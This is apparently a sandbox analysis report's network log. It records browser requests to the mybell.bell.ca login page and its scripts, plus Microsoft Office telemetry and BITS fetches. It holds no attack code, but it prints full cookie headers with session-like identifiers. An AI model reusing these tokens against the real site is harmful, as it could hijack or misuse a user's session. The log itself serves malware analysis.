Source: global trafficHTTP traffic detected: GET /ruxitagentjs_ICA7NQVfghqrux_10299241001084140.js HTTP/1.1Host: mybell.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Login?language=enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|1|e91484a733d016678ba1bae1c170fcf9da65ba43; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; TLP02ce4a58=028702b9c9eb9d45fa93071ef814195a8dde49c75485a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e117b7c25e5473c6b8c7698691dc7ec76a81; TLP409c8162028=08e8c5f15aab2000b6d5af39e455c3dba139d8d53047ea78592ce399b79fe3838682a55060682f3c0814d2c87c113000eba996927cc9b33213252a01388c1491d9327dcd5d217f56d8302374cd353da244286fb3225f8c67d750ec72fed0eaec
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /styles/tealeaf/tltWorker.js HTTP/1.1Host: mybell.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://mybell.bell.ca/Login?language=enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; TLP409c8162028=08e8c5f15aab2000658dd7be8571f1f7ca698feeab004b4b39c1dddf24a7e041e7ed879196bfbed908e430d8e0113000e630a5c08f412de3ee122bc2f1598953a857ecf7349bd26d67667d8c11f87e19abfac47d2e2055f31d93db59e04640af
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static/bell_common.js?cache HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; TLP409c8162028=08e8c5f15aab2000658dd7be8571f1f7ca698feeab004b4b39c1dddf24a7e041e7ed879196bfbed908e430d8e0113000e630a5c08f412de3ee122bc2f1598953a857ecf7349bd26d67667d8c11f87e19abfac47d2e2055f31d93db59e04640af
Source: global trafficHTTP traffic detected: GET /static/bell_common.js?async HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; TLP409c8162028=08e8c5f15aab2000658dd7be8571f1f7ca698feeab004b4b39c1dddf24a7e041e7ed879196bfbed908e430d8e0113000e630a5c08f412de3ee122bc2f1598953a857ecf7349bd26d67667d8c11f87e19abfac47d2e2055f31d93db59e04640af
Source: global trafficHTTP traffic detected: GET /styles/tealeaf/tltWorker.js HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; TLP409c8162028=08e8c5f15aab2000ae893a794f563cb08eb0589656094b09c56d01aeafd1beea65bbd7d42239bc5c08a1bd07611130002d2d00503262cc04401ba957f2addc10f593f74ca3277215ec43985b031f8357759b1dae4f365e9841981da4b5466348
Source: global trafficHTTP traffic detected: GET /ruxitagentjs_ICA7NQVfghqrux_10299241001084140.js HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; TLP409c8162028=08e8c5f15aab2000ae893a794f563cb08eb0589656094b09c56d01aeafd1beea65bbd7d42239bc5c08a1bd07611130002d2d00503262cc04401ba957f2addc10f593f74ca3277215ec43985b031f8357759b1dae4f365e9841981da4b5466348
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /ruxitagentjs_D_10299241001084140.js HTTP/1.1Host: mybell.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://mybell.bell.ca/Login?language=enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; TLP409c8162028=08e8c5f15aab2000b241841862cb126c325ec42da67f89c6fa5a3063993fc26fc041fae42e5908f80827395ca9113000284e3cac240268f8f1b815a23a7dea6e52c94a29df57fe2c39281a962802db4638eaf7f0c303c4afa5ba830a9e009b6f; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; rxvt=1730382118433|1730380318420
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
